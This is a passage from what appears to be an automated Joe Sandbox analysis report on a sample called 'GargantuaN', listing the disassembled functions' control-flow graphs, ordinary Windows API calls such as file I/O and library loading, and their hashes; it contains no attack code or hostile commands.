                                                        • __freea.LIBCMT ref: 00D7AB4B
                                                        • __freea.LIBCMT ref: 00D7AB70
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1414292761-0
                                                        • Opcode ID: fb0bd9a9716a0707b8a0cb24558fd8f0e47f211c8d9790c6357e1d016ac5f338
                                                        • Instruction ID: 4c1ff594c378c6d400eb69ec57b114b3371a3180254dbc1d893fb13084069312
                                                        • Opcode Fuzzy Hash: fb0bd9a9716a0707b8a0cb24558fd8f0e47f211c8d9790c6357e1d016ac5f338
                                                        • Instruction Fuzzy Hash: 96519372610216ABDB258E68CC45EBFB7AAEB84750B298629FC08D6140FB34DC50D7B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D73B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 976 d73b72-d73b7c 977 d73bee-d73bf1 976->977 978 d73bf3 977->978 979 d73b7e-d73b8c 977->979 982 d73bf5-d73bf9 978->982 980 d73b95-d73bb1 LoadLibraryExW 979->980 981 d73b8e-d73b91 979->981 985 d73bb3-d73bbc GetLastError 980->985 986 d73bfa-d73c00 980->986 983 d73b93 981->983 984 d73c09-d73c0b 981->984 987 d73beb 983->987 984->982 988 d73be6-d73be9 985->988 989 d73bbe-d73bd3 call d76088 985->989 986->984 990 d73c02-d73c03 FreeLibrary 986->990 987->977 988->987 989->988 993 d73bd5-d73be4 LoadLibraryExW 989->993 990->984 993->986 993->988
                                                        APIs
                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00D73C35,?,?,00DB2088,00000000,?,00D73D60,00000004,InitializeCriticalSectionEx,00D86394,InitializeCriticalSectionEx,00000000), ref: 00D73C03
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: FreeLibrary
                                                        • String ID: api-ms-
                                                        • API String ID: 3664257935-2084034818
                                                        • Opcode ID: ba28ce8a9395a823418c9fb06351ca69b916ee8b1efc01942c553c1e96a47efa
                                                        • Instruction ID: b90764adbd92021bfcbf33b73f66ccac5dffbc413c3ca11255474b53ed520732
                                                        • Opcode Fuzzy Hash: ba28ce8a9395a823418c9fb06351ca69b916ee8b1efc01942c553c1e96a47efa
                                                        • Instruction Fuzzy Hash: 6B11C632A45721ABCB229B68DC41B5937A49F01B70F294251E95DFB290F770EF0097F5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6AC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34comCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00D6081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D60836
                                                          • Part of subcall function 00D6081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D5F2D8,Crypt32.dll,00000000,00D5F35C,?,?,00D5F33E,?,?,?), ref: 00D60858
                                                        • OleInitialize.OLE32(00000000), ref: 00D6AC2F
                                                        • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00D6AC66
                                                        • SHGetMalloc.SHELL32(00D98438), ref: 00D6AC70
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                        • String ID: riched20.dll$3To
                                                        • API String ID: 3498096277-2168385784
                                                        • Opcode ID: 962f5327143ef5ec107cb2465077bae539534287b039948d4d2f13a9504a2c9b
                                                        • Instruction ID: aec576bd5b6013696894344b706053ef8bafcde9e0558be666c64cc9dbed5dfd
                                                        • Opcode Fuzzy Hash: 962f5327143ef5ec107cb2465077bae539534287b039948d4d2f13a9504a2c9b
                                                        • Instruction Fuzzy Hash: DDF0F4B590020AEFCB10AFA9DD499AFFFFCEF94700F00425AA815E2241DBB456059BB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D598E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 998 d598e0-d59901 call d6ec50 1001 d59903-d59906 998->1001 1002 d5990c 998->1002 1001->1002 1003 d59908-d5990a 1001->1003 1004 d5990e-d5991f 1002->1004 1003->1004 1005 d59927-d59931 1004->1005 1006 d59921 1004->1006 1007 d59936-d59943 call d56edb 1005->1007 1008 d59933 1005->1008 1006->1005 1011 d59945 1007->1011 1012 d5994b-d5996a CreateFileW 1007->1012 1008->1007 1011->1012 1013 d5996c-d5998e GetLastError call d5bb03 1012->1013 1014 d599bb-d599bf 1012->1014 1019 d599c8-d599cd 1013->1019 1020 d59990-d599b3 CreateFileW GetLastError 1013->1020 1015 d599c3-d599c6 1014->1015 1018 d599d9-d599de 1015->1018 1015->1019 1022 d599e0-d599e3 1018->1022 1023 d599ff-d59a10 1018->1023 1019->1018 1021 d599cf 1019->1021 1020->1015 1024 d599b5-d599b9 1020->1024 1021->1018 1022->1023 1025 d599e5-d599f9 SetFileTime 1022->1025 1026 d59a12-d59a2a call d60602 1023->1026 1027 d59a2e-d59a39 1023->1027 1024->1015 1025->1023 1026->1027
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00D57760,?,00000005,?,00000011), ref: 00D5995F
                                                        • GetLastError.KERNEL32(?,?,00D57760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D5996C
                                                        • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00D57760,?,00000005,?), ref: 00D599A2
                                                        • GetLastError.KERNEL32(?,?,00D57760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D599AA
                                                        • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00D57760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D599F9
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: File$CreateErrorLast$Time
                                                        • String ID:
                                                        • API String ID: 1999340476-0
                                                        • Opcode ID: f798f0b3b2585f6597baa8543e2f384a64a6c520d74cc84ca9fb0b69d9816e57
                                                        • Instruction ID: ae740b2d3630997e44bc6529f164838ef8aef5c2dad2f12c1505201cd204d4ab
                                                        • Opcode Fuzzy Hash: f798f0b3b2585f6597baa8543e2f384a64a6c520d74cc84ca9fb0b69d9816e57
                                                        • Instruction Fuzzy Hash: DA310230544345AFEB209F24CC46B9AFB98BB04321F241B19FDA5962D1D3B4A948CFB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6B568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1057 d6b568-d6b581 PeekMessageW 1058 d6b583-d6b597 GetMessageW 1057->1058 1059 d6b5bc-d6b5be 1057->1059 1060 d6b5a8-d6b5b6 TranslateMessage DispatchMessageW 1058->1060 1061 d6b599-d6b5a6 IsDialogMessageW 1058->1061 1060->1059 1061->1059 1061->1060
                                                        APIs
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D6B579
                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D6B58A
                                                        • IsDialogMessageW.USER32(0002047E,?), ref: 00D6B59E
                                                        • TranslateMessage.USER32(?), ref: 00D6B5AC
                                                        • DispatchMessageW.USER32(?), ref: 00D6B5B6
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: Message$DialogDispatchPeekTranslate
                                                        • String ID:
                                                        • API String ID: 1266772231-0
                                                        • Opcode ID: d29e05fa4c8a47d0b69509d59f744f7d19623f8cf74614a778a47aec95e45449
                                                        • Instruction ID: e59c481f7b8eeb148a8b7f6bfd032e845fde2aab2bc587ebf1935088d4e88876
                                                        • Opcode Fuzzy Hash: d29e05fa4c8a47d0b69509d59f744f7d19623f8cf74614a778a47aec95e45449
                                                        • Instruction Fuzzy Hash: A0F0DA71A0132AEB8B20AFE6EC4CDDB7FBCEE057A17044515B90AD2150EB34E645DBB0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6ABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1062 d6abab-d6abca GetClassNameW 1063 d6abf2-d6abf4 1062->1063 1064 d6abcc-d6abe1 call d61fbb 1062->1064 1065 d6abf6-d6abf9 SHAutoComplete 1063->1065 1066 d6abff-d6ac01 1063->1066 1069 d6abe3-d6abef FindWindowExW 1064->1069 1070 d6abf1 1064->1070 1065->1066 1069->1070 1070->1063
                                                        APIs
                                                        • GetClassNameW.USER32(?,?,00000050), ref: 00D6ABC2
                                                        • SHAutoComplete.SHLWAPI(?,00000010), ref: 00D6ABF9
                                                          • Part of subcall function 00D61FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00D5C116,00000000,.exe,?,?,00000800,?,?,?,00D68E3C), ref: 00D61FD1
                                                        • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00D6ABE9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                        • String ID: EDIT
                                                        • API String ID: 4243998846-3080729518
                                                        • Opcode ID: eb6f63975acda11045da406a63aef47c68f830716ea80b805a66b950a3809816
                                                        • Instruction ID: ef1e5ff8fc137a5dee2cf82e0e2db7ed120457eb56155c70621bf94a21b19866
                                                        • Opcode Fuzzy Hash: eb6f63975acda11045da406a63aef47c68f830716ea80b805a66b950a3809816
                                                        • Instruction Fuzzy Hash: D9F08232A00329B7DB206A289C09F9B776C9F46B40F4C4151BA45F2280D760EA418AB6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D59785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1071 d59785-d59791 1072 d59793-d5979b GetStdHandle 1071->1072 1073 d5979e-d597b5 ReadFile 1071->1073 1072->1073 1074 d597b7-d597c0 call d598bc 1073->1074 1075 d59811 1073->1075 1079 d597c2-d597ca 1074->1079 1080 d597d9-d597dd 1074->1080 1077 d59814-d59817 1075->1077 1079->1080 1081 d597cc 1079->1081 1082 d597df-d597e8 GetLastError 1080->1082 1083 d597ee-d597f2 1080->1083 1084 d597cd-d597d7 call d59785 1081->1084 1082->1083 1085 d597ea-d597ec 1082->1085 1086 d597f4-d597fc 1083->1086 1087 d5980c-d5980f 1083->1087 1084->1077 1085->1077 1086->1087 1089 d597fe-d59807 GetLastError 1086->1089 1087->1077 1089->1087 1090 d59809-d5980a 1089->1090 1090->1084
                                                        APIs
                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00D59795
                                                        • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00D597AD
                                                        • GetLastError.KERNEL32 ref: 00D597DF
                                                        • GetLastError.KERNEL32 ref: 00D597FE
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$FileHandleRead
                                                        • String ID:
                                                        • API String ID: 2244327787-0
                                                        • Opcode ID: 3040a77f915ce72bb23223ef5658c88ac571143a574bcb30eec1e35ff90fb312
                                                        • Instruction ID: 9ef5f70a2644fa4d91201c0c630d596814c613feb7f21d9c1d1e30714ca08051
                                                        • Opcode Fuzzy Hash: 3040a77f915ce72bb23223ef5658c88ac571143a574bcb30eec1e35ff90fb312
                                                        • Instruction Fuzzy Hash: EA117C30910204EBDF205F64C824A69BBA9FB46723F24892AEC5AC5290D774DE4CAB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D7AD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1092 d7ad34-d7ad48 1093 d7ad55-d7ad70 LoadLibraryExW 1092->1093 1094 d7ad4a-d7ad53 1092->1094 1096 d7ad72-d7ad7b GetLastError 1093->1096 1097 d7ad99-d7ad9f 1093->1097 1095 d7adac-d7adae 1094->1095 1100 d7ad7d-d7ad88 LoadLibraryExW 1096->1100 1101 d7ad8a 1096->1101 1098 d7ada1-d7ada2 FreeLibrary 1097->1098 1099 d7ada8 1097->1099 1098->1099 1103 d7adaa-d7adab 1099->1103 1102 d7ad8c-d7ad8e 1100->1102 1101->1102 1102->1097 1104 d7ad90-d7ad97 1102->1104 1103->1095 1104->1103
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00D73F73,00000000,00000000,?,00D7ACDB,00D73F73,00000000,00000000,00000000,?,00D7AED8,00000006,FlsSetValue), ref: 00D7AD66
                                                        • GetLastError.KERNEL32(?,00D7ACDB,00D73F73,00000000,00000000,00000000,?,00D7AED8,00000006,FlsSetValue,00D87970,FlsSetValue,00000000,00000364,?,00D798B7), ref: 00D7AD72
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00D7ACDB,00D73F73,00000000,00000000,00000000,?,00D7AED8,00000006,FlsSetValue,00D87970,FlsSetValue,00000000), ref: 00D7AD80
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad$ErrorLast
                                                        • String ID:
                                                        • API String ID: 3177248105-0
                                                        • Opcode ID: f920f423418920d77ecd36dc094df981309620afb469119cab7cd0c2a3629d10
                                                        • Instruction ID: 8ed5ec113998e8658e37c8924d8b2492e8913c70deb165b748761cc0be596a4f
                                                        • Opcode Fuzzy Hash: f920f423418920d77ecd36dc094df981309620afb469119cab7cd0c2a3629d10
                                                        • Instruction Fuzzy Hash: 8E01D436211332ABC7314A6DDC44A5A7B98EF85BA27294620F91ED7650F720DC0187F1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D59F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00D5D343,00000001,?,?,?,00000000,00D6551D,?,?,?), ref: 00D59F9E
                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00D6551D,?,?,?,?,?,00D64FC7,?), ref: 00D59FE5
                                                        • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00D5D343,00000001,?,?), ref: 00D5A011
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$Handle
                                                        • String ID:
                                                        • API String ID: 4209713984-0
                                                        • Opcode ID: 8b84f34be80108529c334573d4fc540de34dc0e953bf518f3bf3941e85340968
                                                        • Instruction ID: 7cd173067a5c836f4b52a6d9c8416c7e0ebebc88a1b881c9d1322d43e4ef0fa8
                                                        • Opcode Fuzzy Hash: 8b84f34be80108529c334573d4fc540de34dc0e953bf518f3bf3941e85340968
                                                        • Instruction Fuzzy Hash: B931CD71208315AFDF148F28D818B6AB7A5EF80B16F040618FD859B2D0C775A94CCBB2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D5A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00D5C27E: _wcslen.LIBCMT ref: 00D5C284
                                                        • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00D5A175,?,00000001,00000000,?,?), ref: 00D5A2D9
                                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00D5A175,?,00000001,00000000,?,?), ref: 00D5A30C
                                                        • GetLastError.KERNEL32(?,?,?,?,00D5A175,?,00000001,00000000,?,?), ref: 00D5A329
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectory$ErrorLast_wcslen
                                                        • String ID:
                                                        • API String ID: 2260680371-0
                                                        • Opcode ID: 3b86aa22dd1fb5ac4819378e147b131ab64d0d2ec60d70905113c514ffd83a29
                                                        • Instruction ID: ee94762111c68768a4fbcd21b397c3a4899d084be9408694353eb5cd0c15e848
                                                        • Opcode Fuzzy Hash: 3b86aa22dd1fb5ac4819378e147b131ab64d0d2ec60d70905113c514ffd83a29
                                                        • Instruction Fuzzy Hash: 5E01D8312102346AFF21ABB98C0ABFD3388DF0A787F484515FD41D6181E764CA89C6B7
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D7B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00D7B8B8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: Info
                                                        • String ID:
                                                        • API String ID: 1807457897-3916222277
                                                        • Opcode ID: b09da05b1ded708ec4cd7bb02fdc32550fe069d18338589891a2f17d5f3fa00b
                                                        • Instruction ID: d5e816ef9f3560beb05c34c24b889fa81a1d41030c0bc3e94901818b54de331c
                                                        • Opcode Fuzzy Hash: b09da05b1ded708ec4cd7bb02fdc32550fe069d18338589891a2f17d5f3fa00b
                                                        • Instruction Fuzzy Hash: 2A41F87050434C9EDB218E288C84BFABBE9EB45314F1844EEE6DEC6142E3359A45CF71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D7AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00D7AFDD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: String
                                                        • String ID: LCMapStringEx
                                                        • API String ID: 2568140703-3893581201
                                                        • Opcode ID: c7f7113d569030fcd53ac10c687a9638fd47a46953f3581e48d8cd42b0d49954
                                                        • Instruction ID: 22f12c1028996762bf7e5ba328461027ae2ef617bdf92013fc1d9f04389f0141
                                                        • Opcode Fuzzy Hash: c7f7113d569030fcd53ac10c687a9638fd47a46953f3581e48d8cd42b0d49954
                                                        • Instruction Fuzzy Hash: 7D01E572504209BBCF02AF94DC06DEEBF66EF48750F458155FE1866260DB32CA31AFA1
                                                        Uniqueness

